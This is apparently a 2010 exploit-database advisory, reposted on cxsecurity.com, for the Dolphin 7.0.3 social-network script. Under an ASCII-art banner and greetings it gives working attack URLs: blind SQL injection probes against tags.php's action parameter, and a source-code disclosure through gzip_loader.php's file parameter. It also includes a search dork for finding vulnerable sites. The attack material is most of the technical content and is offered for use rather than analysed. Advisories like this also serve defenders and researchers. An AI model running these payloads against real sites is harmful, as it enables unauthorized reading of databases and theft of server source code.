Dolphin Vulnerability SQL Injection / disclosure Vulnerability

2010.11.04
Credit: anT!-Tr0J4n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

===================================================================== Dolphin Vulnerability SQL Injection / disclosure Vulnerability ===================================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Exploit Title: Dolphin Mullti Vulnerability # Date : 29-10-2010 # Author : anT!-Tr0J4n # Version : 7.0.3 #DorK : Powered by Dolphin #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends # Home : www.Dev-PoinT.com : http://inj3ct0r.com #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com # Software Link : http://sourceforge.net/projects/boonex-dolphin ====================================================== [>] Dolphin Blind SQL Injection Vulnerability ====================================================== http://server/Dolphin/tags.php?action=[BSQLi] http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=5 --> True http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=4 --> False ======================================================== Dolphin source code disclosure Vulnerability ======================================================== [>] exploit -> http://localhost/Dolphin/gzip_loader.php?file=(file name) =-=-=-=--=-=-=-=-=--=-=-=-=- #Greetz : Dev-PoinT.com ~ inj3ct0r.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top